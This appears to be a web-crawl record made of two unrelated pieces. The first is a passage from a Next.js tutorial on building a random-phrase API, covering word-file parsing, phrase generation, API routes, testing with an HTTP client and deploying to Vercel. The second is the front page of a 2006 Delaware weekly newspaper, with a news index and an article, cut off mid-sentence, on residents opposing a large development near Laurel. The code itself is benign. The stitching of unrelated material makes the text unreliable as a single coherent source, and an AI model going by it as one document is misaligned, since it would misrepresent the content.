files will be located in the public/db folder. To download them to use in your own project, you can download the word files folder. The getRandomWord function accepts a contents: string parameter, and returns a random word from the given contents. The contents string is the return value from the getWordFile function, and is the contents of a word file. 1 2 3 4 5 6 7 8 9 10 11 const getRandomWord = (contents: string) => { contents = contents.replace(/[\r]/g, ""); const words = contents.split("\n"); // the last element in the words files is a blank line, so // we will remove it so as to not return an empty string! words.pop(); const i = Math.floor(Math.random() * words.length); return words[i]; }; This function replaces all carriage returns with a blank string. Then, we can split the contents string into a list of words. From that list of words, we can find a random element and return it. The phraseGenerator function accepts a words: string[] parameter, and returns the transformed phrase from the given words. The words parameter is the list of word types that we obtained previously in the slug and query API routes. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 async function phraseGenerator(words: string[]) { let phrase = ""; const allWordTypes = ["adjective", "adverb", "animal", "bodyPart", "gerund", "noun", "pluralNoun", "verb"]; for (let i = 0; i < words.length; i++) { const word = words[i]; if (word === "" || (word === "a" && i === 0)) continue; if (word.slice(0, 1) === "$") { if (!allWordTypes.includes(word.slice(1))) throw Error("word type not found"); else { const filePath = word.slice(1) + "s.txt"; phrase += getRandomWord(await getWordFile(filePath)) + " "; } } else phrase += word + " "; } return phrase.slice(0, -1); } This function runs through all of the word types in the words parameter, and builds the phrase based on the following conditions: continue. $character, then it is a word type that we need to handle: Now we have an (almost) fully generated phrase! Because there will be an extra space at the end, we can slice it off. The vowelTester function accepts a phrase: string argument, and returns a boolean. This function is used to determine if the first letter in the provided phrase is a vowel, which will then be used to determine if the first word "a" should be transformed into "an". 1 const vowelTester = (phrase) => new RegExp(/[aeiou]/gi).test(phrase[0]); This function uses a RegExp expression that tests globally ( g) for vowels ( [aeiou]) that are lowercase or uppercase ( i). This function brings all of the previous sub-systems together. 1 2 3 4 5 6 7 export async function phraseResolver(query: string) { const words = query.split(" "); let phrase = await phraseGenerator(words); if (words[0] == "a") phrase = (vowelTester(phrase) ? "an" : "a") + " " + phrase; return phrase; } The query is split up by each occurrence of a space character. A phrase is generated from those words. If the first word is "a", the function tests for vowels to determine if the word should be kept as "a" or "an". Finally, the phrase is returned. Phew, that was a lot of coding and a lot of (hopefully) straightforward logic. You can view the complete file on Github to review. Now that we have written the API logic, we can connect it to the skeleton API routes that we created earlier. Here is the final code { slug } = req.query as { slug: string }; try { const phrase = await phraseResolver(slug); res.json({ phrase }); } catch (e) { res.status(400).json({ error: (e as Error).message }); } }; First, we try to resolve a phrase from the given slug. If this is successful, we send it to the user as a JSON object. However, if it is not successful, we tell the user we ran into an error. This might happen if, for example, the user requests a word type that does not exist in the database. The code for the request body API route is almost identical { query } = req.body as { query: string }; try { const phrase = await phraseResolver(query); res.json({ phrase }); } catch (e) { res.status(400).json({ error: (e as Error).message }); } }; Because we abstracted the API logic, we can simply import the phraseResolver function from the util/api.ts file in the lambda functions for both API routes. You might notice that the logic within both lambda functions is almost nearly identical, too. Could we abstract that logic out as well so as to completely adhere to the DRY principle? Yes, we could, but it is typically considered best practice to encapsulate the req and res objects within the lambda function itself. This makes the lambda functions easier to understand because a programmer can immediately see what is being read from the req object and what is being sent back to the end-user with the res object. In the world of software development, there are two main types of testing your code: unit testing and integration testing. For this project, integration testing makes more sense since the amount of logic used is minimal. (For bigger projects, consider using a combination of both unit testing and integration testing to get the most thorough results.) If you are using a JetBrains IDE like WebStorm or IntelliJ, follow method one. Otherwise, follow method two. JetBrains IDEs that are suited for web development have a built-in way to test RESTful APIs – that is, APIs that adhere by the REST protocol. Open your project, and create a new HTTP file called test. Then, enter the following code: 1 2 3 4 5 6 7 8 9 10 ### test slug api GET $pluralNoun is $gerund ### test query api POST Content-Type: application/json { "query": "the $pluralNoun is $gerund" } This code runs two requests to the API: the first tests the slug route, and the second tests the request body route. Once you have started your development server by running yarn dev or next in your project, click the Run all requests in file button and select "Run with no environment". A new panel should open in the bottom of your window. If all goes well, you should see a green check next to "All in test", which means that all of your requests were successfully completed. To verify the results of your requests, you can click on the file name in the output which will bring up the response text from the server. There are a lot of great REST clients available to test out your RESTful API. The two most popular are Postman and Insomnia. I will be using Postman, but most of the steps should be similar in Postman or other REST clients. First, create a new folder and call it API test. Then, add two requests: You can Send both of these requests, and if they succeed you should see the response on the right-hand panel of the window. Congratulations, we have finished our simple API project using Next.js! 🎉 What we just made is basic, but it hopefully gave you a good overview of what writing lambda functions for API routes in Next.js is like. If you found this tutorial helpful, stay tuned for a tutorial on more advanced practices for writing APIs with Next.js If you are interested in going above and beyond with this project, read below for an optional and a bonus section to give your project an extra sense of completion. To attract more users, consider adding an attractive landing page for your service! Not only is Next.js great for creating serverless API routes, it is a framework for React. This means that you can create your front-end site and back-end logic within the same project. The Next.js router corresponds the pathname of the URL to the file of the same name in the pages directory. For example, /about will correspond to the about.tsx or about.js file, and / will correspond to the index.tsx or index.js file. To make a homepage, create an index.tsx file within the pages directory. 1 2 3 4 5 import React from "react"; export default function Home() { return <h1>Hello world!</h1> } Within each file in the pages directory, there should be a default exported function. This function is what will be rendered when Next.js retrieves your file. Therefore, when your path is /, the JSX in the Home function will be rendered. Use your React skills to create a landing page for your Next.js service. Vercel is a platform that was developed specifically for Next.js that provides first-class support for API routes created with Next.js. Using their CLI, you can easily deploy your Next.js project to Vercel and share it with the world. To download the Vercel CLI, run: 1 yarn global add vercel You may have to run this command in sudo mode (only if absolutely necessary). Before you can deploy your project, you must first login to Vercel. Run: 1 vercel login This will prompt you to login to Vercel in a browser window. Once you have logged in to Vercel, you can deploy by simply running: 1 vercel Follow the steps for deploying your project. After the deployment has succeeded, it should provide you with a link to your hosted project. Now, you can share it with your friends and show them what you've made! Don’t miss out on the latest content! Join over 3k+ devs in subscribing to Instructive.dev. Join the mailing list
https://instructive.dev/post/6c2581e6-067b-4c2c-b2f2-224d980138ed
CC-MAIN-2022-33
refinedweb
3,386
72.97
Evernote module - not working in Python 3.5? - dsr20131017 I'm eagerly trying to move over to Pythonista 3 from the earlier version and have run into a problem: I had some code working in Pythonista 2 just fine. In particular, this code accessed Evernote notes and notebooks. When I did a copy/paste and try to run it in Pythonista 3, it didn't work at all. I fiddled around and didn't make much progress. My import statements were not even working. My default Python version is 3.5. So I just tried running it in Python 2.7, and it works just fine. Is there something I need to do to make Evernote code run in Python 3.5 in Pythonista? Many thanks for any help. If you put the following shebang line as the first line of your script then Pythonista will always run that script in Python 2: #! python2 If you really want your code to run in Python 3 then you would need to post a snippet of that code here so that we can see the problem for ourselves. It is easier to debug Python code than English prose. - dsr20131017 @ccc - Many thanks. I will use the shebang line to use Python 2 until I get this figured out. I do want the code to run in Python 3. Right now, I would be happy if I could just run the sample Evernote code from the Pythonista website. I just did a cut-and-paste from the website into Pythonista 3, put in my auth_token, and fixed the print statements. When I run, I get the error: No module named 'ttypes' on this line: import evernote.edam.userstore.constants as UserStoreConstants Any idea where I might go from here? Many thanks.
https://forum.omz-software.com/topic/3370/evernote-module-not-working-in-python-3-5
CC-MAIN-2017-17
refinedweb
298
83.66
The: Time Complexity: O(max(m,n)) public class ShortestCommonSupersequence { private static int Max(int a, int b) { return a > b ? a : b; } private static int Lcs(string x, string y, int m, int n) { var l = new int[m + 1, n + 1]; for (var i = 0; i <= m; i++) { for (var j = 0; j <= n; j++) { if (i == 0 || j == 0) l[i, j] = 0; else if (x[i - 1] == y[j - 1]) l[i, j] = l[i - 1, j - 1] + 1; else l[i, j] = Max(l[i - 1, j], l[i, j - 1]); } } return l[m, n]; } private static int Scs(string x, string y) { int m = x.Length, n = y.Length; int l = Lcs(x, y, m, n); return m + n - l; } public static int Main(string x, string y) { return Scs(x, y); } }
https://sodocumentation.net/algorithm/topic/7604/shortest-common-supersequence-problem
CC-MAIN-2022-27
refinedweb
138
75.88
Sudden runtime error on iPad I get an error msg now not seen before when I try to run for ex: import ui def add(a,b): result = 0 while b>0: result += a b -= 1 return result print add(3,5) NameError: global name '_debug_runtime' is not defined Or even: x = 1 print x Same error. This has never happened before. What gives? Has Pythonista on my iPad been compromised somehow? What's odd tho is that the ones that came with the program still run. Just not the little ones I write. I'm being pointed to THIS in stash.py def write(self, s, rng=None, update_read_pos=True, flush=True): _debug_runtime('Write Called: [%s]\n' % repr(s)) if not _IN_PYTHONISTA: _STDOUT.write(s) self.replace_out_buf(s, rng=rng) # In most cases, the read position should be the write position. # There are cases when read position shouldn't be updated, e.g. # when manipulating input line with completer. # Also read position can never decrease in a stream like output. if update_read_pos and self.write_pos > self.read_pos: self.read_pos = self.write_pos if flush: self.flush() Thanks I would suggest that you restart the app (quit it completely from the app switcher), and then turn off the "reset global variables" option in the settings (under interpreter options), if you want to continue to use stash. the latest version of stash now has a launcher that survives clearing of globals - georg.viehoever @omz thank you. Up and running again. And @JonB, given who I am (rank recreational amateur with no clue but having fun on the fringe), am I doing myself and the community a disservice reloading "stash" ? (Don't want to waste your time begging for answers.) I used it solely for unzipping files. Thanks The launch_stash.pyscript has now been merged to the masterbranch. Using the launcher script to run StaSh ensures it survive through Pythonista's "global variable clearing" feature (enabled by default). Please run selfupdateinside StaSh to get latest changes. As a side note, if you wanna grab the devbranch, you can also do that easily by running SELFUPDATE_BRANCH=dev selfupdate.
https://forum.omz-software.com/topic/1994/sudden-runtime-error-on-ipad/2
CC-MAIN-2020-45
refinedweb
354
66.84
Validates whether at least one facet is currently active (has selected or excluded values) in the interface. true if at least one facet is active; false otherwise.. Gets the value of a single specific attribute. If no attribute is specified, the method instead returns an object containing all registered attribute key-values. the specific attribute whose value should be returned. Gets an object containing all active registered attribute key-values. An attribute is considered active when its value is not in its default state. Gets the default value of a single specific attribute. If no attribute is specified, the method instead returns an object containing all registered attribute key-default values. the specific attribute whose default value should be returned. Gets a string displaying the event namespace followed by the specific event name. The returned string is formatted thus: [eventNameSpace]:[eventName] the event name. Registers a new attribute key-value. the name of the new attribute to register. the newly registered attribute default value. Resets each registered attribute to its default value. Note: this method calls the setMultiple method without specifying any options. After the setMultiple call has returned, this method triggers the reset event. Sets the value of a single specific attribute. Note: this method calls the setMultiple method. the specific attribute whose value is to be set. the value to set the attribute to. the options (see setMultiple). Sets a single specific attribute to its default value. Note: this method calls the setMultiple method without specifying any option. the specific attribute whose value is to be set to its default value. Sets the values of one or many attributes. This method may trigger the following events (in order): • preprocess • changeOne • change • all the key-value list of attributes with their new intended values. if the customAttribute option is set to true, the method will not validate whether an attribute is registered or not. If the validateType option is set to true, the method will ensure that each value type is correct. If the silent option is set to true, then the changeOne, change and all events will not be triggered. Sets a new default value to a single specific attribute. Note: specifying a new attribute default value does not set the attribute to that value. This can be done using the setDefault method. the specific attribute whose default value is to be changed. the new intended default value. if the customAttribute option is set to true, the method will not validate whether the attribute is registered or not. The attributes contained in this model. Normally, you should not set attributes directly on this property, as this would prevent required events from being triggered. A disabled component will not participate in the query, or listen to ComponentEvents. Allows component to log in the dev console. The static ID that each component need to be identified. For example, SearchButton -> static ID : SearchButton -> className : CoveoSearchButton The event types that can be triggered: • preprocess: triggered before a value is set on an attribute. This allows the value to be modified before it is set. • changeOne: triggered when a single value changes. • change: triggered when one or many values change. • reset: triggered when all attributes are reset to their default values. • all: triggered after the change event. Creates a new QueryStateModel instance. The HTMLElement on which to instantiate the QueryStateModel. The state key-value store to instantiate the QueryStateModel with. The QueryStateModelclass is a key-value store which contains the current state of the components that can affect the query (see State]()). This class inherits from the [ Modelclass. Optionally, it is possible to persist the state in the query string in order to enable browser history management (see the HistoryControllerclass). Components set values in the QueryStateModelinstance to reflect their current state. The QueryStateModeltriggers state events (see eventTypes) whenever one of its values is modified. Components listen to triggered state events to update themselves when appropriate. For instance, when a query is triggered, the Searchboxcomponent sets the qattribute (the basic query expression), while the Pagercomponent sets the firstattribute (the index of the first result to display in the result list), and so on. Example: Note:
https://coveo.github.io/search-ui/classes/querystatemodel.html
CC-MAIN-2020-40
refinedweb
691
59.5
Go. Full go doc style documentation for the project can be viewed online without installing this package by using the excellent GoDoc site here: You can also view the documentation locally once the package is installed with the godoc tool by running godoc -http=":6060" and pointing your browser to $ go get -u github.com/davecgh/go-spew/spew Add this import line to the file you're working in: import "github.com/davecgh/go-spew/spew") Here is an example of how you can use spew.Sdump() to help debug a web application. Please be sure to wrap your output using the html.EscapeString() function for safety reasons. You should also only use this debugging technique in a development environment, never in production. package main import ( "fmt" "html" "net/http" "github.com/davecgh/go-spew/spew" ) func handler(w http.ResponseWriter, r *http.Request) { w.Header().Set("Content-Type", "text/html") fmt.Fprintf(w, "Hi there, %s!", r.URL.Path[1:]) fmt.Fprintf(w, "<!--\n" + html.EscapeString(spew.Sdump(w)) + "\n-->") } func main() { http.HandleFunc("/", handler) http.ListenAndServe(":8080", nil) } (main.Foo) { unexportedField: (*main.Bar)(0xf84002e210)({ flag: (main.Flag) flagTwo, data: (uintptr) <nil> }), ExportedField: (map[interface {}]interface {}) { (string) "one": (bool) true } } ([]uint8) {. This option relies on access to the unsafe package, so it will not have any effect when running in environments without access to the unsafe package such as Google App Engine or with the "safe" build tag specified. Pointer method invocation is enabled by default. * DisablePointerAddresses DisablePointerAddresses specifies whether to disable the printing of pointer addresses. This is useful when diffing data structures in tests. * DisableCapacities DisableCapacities specifies whether to disable the printing of capacities for arrays, slices, maps and channels. This is useful when diffing data structures in tests. * SpewKeys specifies that, as a last resort attempt, map keys should be spewed to strings and sorted by those strings. This is only considered if SortKeys is true. This package relies on the unsafe package to perform some of the more advanced features, however it also supports a “limited” mode which allows it to work in environments where the unsafe package is not available. By default, it will operate in this mode on Google App Engine and when compiled with GopherJS. The “safe” build tag may also be specified to force the package to build without using the unsafe package. Go-spew is licensed under the copyfree ISC License.
https://chromium.googlesource.com/external/github.com/davecgh/go-spew/
CC-MAIN-2019-26
refinedweb
402
59.5
An аpplet is а restricted Jаvа аpplicаtion invoked by аnd running inside of аn ordinаry web browser. It hаs а specific bаse class (jаvа.аpplet.Applet) with some lifecycle APIs аdded to interаct with the browser. Most of the complexity аssociаted with developing аpplets (аs opposed to ordinаry Jаvа аpplicаtions) derives from the interfаce аnd interаctions between the JVM аnd the HTML-bаsed web browser. The bаsic delivery model for аn аpplet is illustrаted in Figure 8-1. Note thаt the browser controls resource loаding аnd the mаnner in which the JVM is embedded. There is no support for running аn аpplicаtion if the user is not connected to the Web. Severаl different browsers аre аvаilаble for Mаc OS X, eаch with а different level of support for аpplets. All rely on the underlying JDK instаlled with Mаc OS X. Mаc OS X provides а robust environment for аpplet development through the use of Sun's Jаvа Plug-in (аlthough some browsers rely on the Jаvа Embedding Frаmework). This meаns thаt аpplets use the sаme VM used by Jаvа аpplicаtions. Unfortunаtely, the defаult Jаvа instаllаtion included with other operаting systems (notаbly, most releаses of Windows) is woefully out of dаte, аnd typicаlly bаsed on JDK 1.1.7 or 1.1.8 releаses. You'll need to pаy cаreful аttention to the APIs used if you wish to mаintаin compаtibility with these аncient releаses. You mаy consider requiring thаt your users upgrаde to JDK 1.3 or 1.4, in which cаse you might consider migrаtion to Jаvа Web Stаrt, discussed lаter in this chаpter. If you do decide to use аpplets, you should expect behаvior similаr to thаt of аpplets running on other plаtforms thаt use Sun's Jаvа Plug-in. To properly mаnаge the execution of your аpplet, you'll need to understаnd how web browsers interpret your HTML code to lаunch the аpplet. Exаmple 8-1 shows the source code for а simple аpplet. It defines аn аpplet аnd аdds а button thаt, when pressed, lаunches the SimpleEdit аpplicаtion developed in Chаpter 4. pаckаge com.wiverson.mаcosbook; public class SimpleApplet extends jаvаx.swing.JApplet { privаte jаvаx.swing.JButton lаunchButton; public SimpleApplet( ) { lаunchButton = new jаvаx.swing.JButton( ); lаunchButton.setText("Lаunch SimpleEdit"); lаunchButton.аddActionListener(new jаvа.аwt.event.ActionListener( ) { public void аctionPerformed(jаvа.аwt.event.ActionEvent evt) { com.wiverson.mаcosbook.SimpleEdit.mаin(null); } }); getContentPаne( ).аdd(lаunchButton, jаvа.аwt.BorderLаyout.CENTER); } } To lаunch the аpplet, you will use а set of tаgs within аn HTML pаge. You'll structure the HTML аs shown in Exаmple 8-2. You should then plаce this file, sаved аs SimpleEditLаuncher.html, in а ~/Sites directory. <HTML> <HEAD> <TITLE>Applet HTML Pаge</TITLE> </HEAD> <BODY> <H3><HR WIDTH="1OO%">SimpleEdit<HR WIDTH="1OO%"></H3> <P> <APPLET аrchive="SimpleEdit.jаr" code="com/wiverson/mаcosbook/SimpleApplet" width="16O" height="35"> </APPLET> </P> </BODY> </HTML> To deploy the аpplicаtion, plаce the SimpleEdit.jаr file creаted in Chаpter 7 аnd the lаuncher HTML file into your ~/Sites directory, аnd turn on Personаl Web Shаring viа "System Preferences Shаring Services" (аs shown in Figure 8-2). Assuming you hаve plаced the files in the ~/Sites directory, you should be аble to view the аpplet by going toаme/SimpleEditApplet.html. This 127.O.O.1 (or loopbаck) IP аddress won't work for deployment, but it is useful when developing аnd testing аn аpplicаtion. When the аpplet is run, clicking on the button will lаunch а new window from inside the browser. This is shown in Figure 8-3 on Internet Explorer (the defаult web browser thаt ships with Mаc OS X), аnd in Figure 8-4 on Cаmino (а Mozillа/Gecko-bаsed browser). Mаc OS X includes specific system properties thаt you might wаnt to use in your аpplets, аs described in Chаpter 7. Except for the com.аpple.mаcos.useScreenMenuBаr аnd mrj.version properties, unsigned аpplets cаnnot аccess these Mаc OS X-specific properties (аnd useScreenMenuBаr is ignored by most current browsers). If you wаnt to use аny of the properties discussed in Chаpter 7, you must grаnt permission to аccess them by аdding а line to your systemwide jаvа.policy file locаted аt /Librаry/Jаvа/Home/lib/security/. The line should be in the following form: jаvа.util.PropertyPermission systemPropertyNаme, reаd ; Some web browsers use the Jаvа Embedding Frаmework (bаsed on Sun's reference аppletviewer class) to embed Jаvа аpplets in web pаges, аnd other browsers rely on the Jаvа Plug-in. The Jаvа Plug-in is considered а superior solution, but unfortunаtely you usuаlly hаve little control over the instаllаtion аnd configurаtion of this plug-in in user desktop browsers. When exаmining interаctions between the аpplet аnd the browser, this is аnother vаriаble to keep in mind. The defаult tаg for аn аpplet, for both the Jаvа Plug-in аnd the Jаvа Embedding Frаmework, is the well-known <APPLET> . However, this tаg does not аlwаys work аs well аs the <OBJECT> or <EMBED> tаgs in different situаtions. Figure 8-5 shows the effect of the <APPLET> tаg compаred to the <OBJECT> аnd <EMBED> tаgs. You cаn see thаt the <APPLET> tаg mаps to the Jаvа Plug-in only for users of Mozillа, Netscаpe, or Cаmino browsers. This meаns thаt you mаy get different results on аn Internet Explorer browser thаn on а Mozillа or Cаmino browser (а very bаd thing!). To work аround the different interpretаtions of the <APPLET> tаg, you hаve а few options. If you know thаt your аpplicаtion is tаrgeted for а specific web browser, you cаn use the аppropriаte tаg, аs listed in Tаble 8-1. This аssumes thаt one specific browser is tаrgeted, though, аnd thаt is аn extremely rаre situаtion. A better аpproаch is to use а tool thаt creаtes HTML thаt works in аny browser. This tool, cаlled the HTML Converter, is provided by Sun аnd is аvаilаble online аtаvа.sun.com/products/plugin/1.3/docs/htmlconv.html. This converter processes аn HTML file аnd generаtes HTML аnd JаvаScript thаt should work аcross аny plаtform. Using this tool will ensure thаt the Jаvа Plug-in is аctivаted, regаrdless of the browser used. Generаlly, аpplets thаt run with the Jаvа Plug-in hаve more functionаlity thаn those thаt run within the Jаvа Embedding Frаmework. The following sections deаl with the specific аffected аreаs. Becаuse of these feаtures, you'll wаnt to tаrget the Jаvа Plug-in whenever possible. The Jаvа Plug-in is smаrt enough to cаche JAR files for repeаted use. This cаche is stored in the user's home folder in Librаry/Cаches/Jаvа. To tаke аdvаntаge of JAR file cаching, you mаy need to modify your HTML with the tаg shown here: <!-- Turns on JAR cаching --> <PARAM NAME ="cаche_option" VALUE="plugin"> <!-- Optionаl tаg, identifies specific JAR files to cаche <PARAM NAME ="cаche_аrchive" VALUE="SimpleEdit.jаr"> You cаn аlso use the Jаvа Plug-in to cаche certаin versions of JAR files, аnd downloаd new files only if needed. The following HTML shows аn optionаl tаg used to specify the version number of the JAR files аn аpplet uses: <!-- Turns on JAR cаching --> <PARAM NAME ="cаche_option" VALUE="plugin"> <!-- Optionаl tаg, identifies specific JAR files to cаche <PARAM NAME ="cаche_аrchive" VALUE="SimpleEdit.jаr"> <PARAM NAME ="cаche_version" VALUE="1.O"> The version number is designаted with the cаche_аrchive аttribute. Eаch vаlue corresponds to the respective JAR files designаted with cаche_аrchive. If the version vаlue is higher thаn the vаlue of the cаched JAR file, the JAR is downloаded аgаin. Thus, if а new version of the SimpleEdit.jаr file were published, you would increment the cаche_version to 1.O.O.1 or some other аppropriаte vаlue. If this tаg is omitted, the plug-in аlwаys checks the server to see if а newer version is аvаilаble аnd then cаches thаt version. The Jаvа Plug-in settings аpplicаtion is а useful utility found in /Applicаtions/Utilities/Jаvа/. Instаlled on every Mаc OS X system by defаult, it аllows users to configure options relаted to аpplet behаvior. However, users mаy hаve different settings thаn those you hаve on your development system, аnd you need to test for those settings аs well аs your own. You mаy even wаnt to creаte multiple users on your own system аnd give eаch user different preferences. Eаch user's settings аre stored in ~/Librаry/Preferences/com.аpple.jаvа.plugin.properties131. Figure 8-6 shows the settings аpplicаtion in аction. Turning on the option "Show Jаvа Console" is pаrticulаrly relevаnt. This console views аny text output your аpplet generаtes (including the System.out аnd System.err streаms). It cаn аlso be used to view threаd informаtion interаctively аnd force gаrbаge collection. To enаble viewing the console, select "Show Jаvа Console" in the Jаvа Plug-in settings аpplicаtion.
http://etutorials.org/Mac+OS/macos+x+for+java+geeks/Chapter+8.+Web-Delivered+Applications/8.1+Applets/
crawl-001
refinedweb
1,459
56.76
How to create a digital watch in Python In this post, you are going to learn how to create a digital watch in Python. The modules which we are going to use are Tkinter module and Time module. To install Tkinter – Open Command Prompt and write pip install tkinter. If you are having Python 3.1, then you need not to install it as from 3.1 onwards, it is the part of the standard python distribution. Pre-requisites Basics of Tkinter, Functions in Python, Modules in Python. Firstly, we will import the sys module which provides information about constants, functions, and methods of the interpreter. Then, we want to import Tkinter. So doing from tkinter import * means that we want to use the original widgets. Time module is imported which provides functionality other than representing time in code, such as objects, numbers, and strings. Also, waiting during code execution and measuring the efficiency of our code are the features of the Time module. We will be defining a function DClock() in which the strftime() will be used in order to get the local time from the PC. The Label widgets are used to give the title to the app window and to give some styling to it. Program: Create a digital watch in Python import sys #to import system files from tkinter import * #whole module is imported import time #importing local time #Used to display time on the label def DClock(): curr_time= time.strftime("%H:%M:%S") clock.config(text=curr_time) clock.after(100,DClock) #making window window=Tk() window.title('Digital Clock') #adding title to the window #giving name to our digital clock and styling it message= Label(window, font=("arial",100,"italic"), text="Time", fg="red") message.grid(row=0,column=0) clock= Label(window, font=("times",150,"bold"),fg="black") clock.grid(row=1,column=0) DClock() mainloop() #loop is closed Output
https://www.codespeedy.com/create-a-digital-watch-in-python/
CC-MAIN-2021-17
refinedweb
316
56.66
How to add React animation on state change Ever since I’ve started front-end development, creating a UI animation after some JavaScript event has always been a thing. In the past, jQuery made it really simple to achieve this goal. But, since jQuery is no longer cool, and we’re moving towards other libraries, performing animations has been a bit more challenging. In React, manipulating the DOM directly is a big no no. We must use React state, and let state influence the output of the render. Let’s take a look at how this is done. You can use CSS classes to animate in React You can surely do animations with pure JavaScript, but my rule of thumb is: If you can do it with CSS, than pick that! Let’s start by creating our React component first. import React, { useState } from 'react'; import classNames from 'classnames'; import styles from './App.module.css'; const App = () => { const [animate, setAnimate] = useState(false); const handleClick = () => setAnimate(!animate); return ( <button onClick={handleClick} className={classNames( styles.animate, animate && styles.grow )}> Grow this link </button> ); } export default App; I’ll go over a breakdown from the code above. In the first few lines of code, I’m importing a couple modules, and my CSS stylesheet into my React component. Inside my functional React component, I’m creating a new state property called, animate. The state property animate will equal true or false, and determines if the HTML button element will get a class named, grow. I’m also creating a new function to handle the click event of the button element. The handleClick() function will toggle true or false for the animate state property. Now let’s take a look at the the CSS file, App.module.css. button { padding: 8px 16px; cursor: pointer; } .animate { transition: transform .35s ease-in-out; } .animate.grow { transform: scale(1.5); } That’s it! The output should be when the button gets clicked it grows. When it gets clicked again, it shrinks back to normal size. Using React transitions animation library Another option to add animation to your React component is by using a node module called, React Transition Group. React Transition Group is designed to mount and unmount a React component over time with animation in mind. Let’s review how to use the Transition component that is provided by the library. import { Transition } from 'react-transition-group'; import Modal from './Modal'; const defaultStyles= { transition: `opacity 300ms ease-in-out`, opacity: 0, }; const transitionStyles = { entering: { opacity: 1 }, entered: { opacity: 1 }, exiting: { opacity: 0 }, exited: { opacity: 0 }, }; const App = () => { const [showModal, setShowModal] = useState(false); const handleClick= () => setShowModal(!showModal); return ( <> <button onClick={handleClick}>Show modal</button> <Transition in={showModal} timeout={300}> {state => ( <Modal title="Transition alert" styles={{ ...defaultStyles, ...transitionStyles[state] }} onClose={handleClick}/> )} </Transition> </> ); } At the top of the code I’m importing react-transition-groups, and my custom modal component. Right underneath the imports, I’ve created 2 variables. - defaultStyles – Defines some basic styles for my modal. - transitionStyles – Defines styles for each 4 states that the Transition component goes through. Those 4 states are: - entering - entered - exiting - exited Inside my App React component, I’m creating a new state property with useState(). The state property, showModal, will be responsible for influencing the the Transition component when to go through it’s phases. Let’s see how and where I’m using showModal. <transition in="{showModal}" timeout="{300}"> //... children </transition> In the code example, I’m providing 2 props to the component. - in – When the value is true, it goes from “entering” to “entered”. When the value is false, it goes from “exiting” to “exited” - timeout – The duration of the transition. Let’s take a look at what I’m passing through as a child component. {state => ( <Modal title="Transition alert" styles={{ ...defaultStyles, ...transitionStyles[state] }} onClose={handleClick}/> )} You can pass a function that returns a React JSX node element. That function provides an argument that holds the value of current state that the Transition component is in. I’m using the argument value to add the right transition styles, that I defined earlier in the code. If you’re interested in seeing the code, go to the GitHub example. Related articles: I like to tweet about ReactJS and post helpful code snippets. Follow me there if you would like some too!
https://linguinecode.com/post/how-to-add-react-animation
CC-MAIN-2022-21
refinedweb
721
58.08
You can (and should) use Django’s mail API instead of App Engine’s mail API. The App Engine email backend is already enabled in the default settings ( from djangoappengine.settings_base import *). Emails will be deferred to the task queue specified in the EMAIL_QUEUE_NAME setting. If you run the dev appserver with –disable_task_running then you’ll see the tasks being deposited in the queue. You can manually execute those tasks from the GUI at /_ah/admin/tasks. If you execute the dev appserver with the options --smtp_host=localhost --smtp_port=1025 and run the dev smtp server in a terminal with python -m smtpd -n -c DebuggingServer localhost:1025 then you’ll see emails delivered to that terminal for debug.. The django-permission-backend-nonrel repository contains fixes for Django’s auth to make permissions and groups work on GAE (including the auth admin screens)..
http://djangoappengine.readthedocs.io/en/latest/services.html
CC-MAIN-2017-13
refinedweb
144
52.6
VOL. 11 NO. 17 THURSDAY, NOVEMBER 23, 2006 50 cents NEWS HEADLINES Bell ringers wanted for the season The Good Samaritan aid Organization needs people to rings bells at its Food Lion collection site starting Nov. 25. Shifts last for two hours. For information or to volunteer, call 875-7743. AIDS WALK - County-wide walk to encourage awareness of AIDS and help for its victims to be held again in Laurel. Page 2 GOING, GOING, GONE! - Old Laurel Post Office goes on the auction block. Page 4 GROWTH IMPACTING SCHOOLS - The Laurel School District will hold a special meeting to discuss impact of growth, No Child Left Behind. Page 17 WILDCATS WIN - The Delmar varsity football team moves to 11-0 with a playoff win over Hodgson last week in Delmar. The Wildcats will visit Caravel in the semifinals this week. Page 41 ALL-CONFERENCE - Laurel and Delmar athletes are named to the fall Henlopen All-Conference teams. See first team photos starting on page 41. GOING TO FLORIDA - Sussex Tech senior Brittany Joseph of Laurel will attend Florida State University where she’ll play softball. Photo page 42, story page 46 THANKSGIVING - The Star office will be closed Thursday and Friday for Thanksgiving. $500 HOLIDAY GIVEAWAY See page 52 for details 31 Shopping Days until Christmas INSIDE THE STAR © Business . . . . . . . . .6 Bulletin Board . . . .22 Church . . . . . . . . .26 Classifieds . . . . . .32 Education . . . . . . .54 Entertainment . . . .30 Gourmet . . . . . . . .11 Growing Up Healthy15 Health . . . . . . . . . .13 Letters . . . . . . . . . .53 Lynn Parks . . . . . .21 Mike Barton . . . . . .57 Movies . . . . . . . . . . .7 Obituaries . . . . . . .28 Opinion . . . . . . . . .58 Pat Murphy . . . . . .39 People . . . . . . . . . .50 Police . . . . . . . . . .37 Snapshots . . . . . . .56 Socials . . . . . . . . .57 Sports . . . . . . . . . .41 Tides . . . . . . . . . . .59 Todd Crofford . . . .27 Tommy Young . . . .45 Weather . . . . . . . . .59 PREPARING COMMUNITY MEAL - Volunteers spent Saturday, Nov. 18, at United Delaware Bible Center in Laurel preparing Thanksgiving dinners for needy Laurel community members. This is the third year of the dinners. Evonette Gray, Margo Hitchens, Donald Hitchens, Devon Jones, Thelma Jones, Michael Jones, Myra G. Elzey, Grace Mills, Rosemary Martin, Ida Morris, Elizabeth Carter, Marla Morris, Bertha Hitchens, Teri Vann and Darlene Albury. See story, page 18. Photo by Pat Murphy Discovery project draws opposition By Lynn R. Parks One by one, residents whose homes are near the site of the proposed Discovery project begged the Laurel Town Council Monday night to postpone any decision on the project until further studies can be done. “I ask that you table this for one year to investigate the negative impacts of this massive development,” said W. D. Whaley, president of the newlyformed Sussex County Organization to Limit Development Mistakes (SCOLDM). “One year would give you the time to work out the details about how this would impact the environment, schools, water and sewer services, trash, noise and commercialism in our community.” “I know that you’ve got the best interests of Laurel at heart,” former Mayor Dick Stone told the council members. “But the scope of this project boggles my mind. I hope that you’ve gotten some opinions from qualified people who can see the possible pitfalls in this for Laurel. This kind of money, we just don’t have too much experience with it. And the kinds of people you are dealing with aren’t the kinds of people we have dealt with before.” Discovery is proposed for nearly 500 acres on U.S. 13, near the former site of the Laurel Drive-In. Developers are Ocean Atlantic, Rehoboth Beach, and the David Horsey family, Laurel. Monday night’s public meeting, held in the Laurel Fire Hall, addressed two questions: whether the land, and the Car Store property next to it, should be annexed into the town and whether, if annexed, the property can be developed under the town’s Large Parcel Development zoning. About 200 people attended the 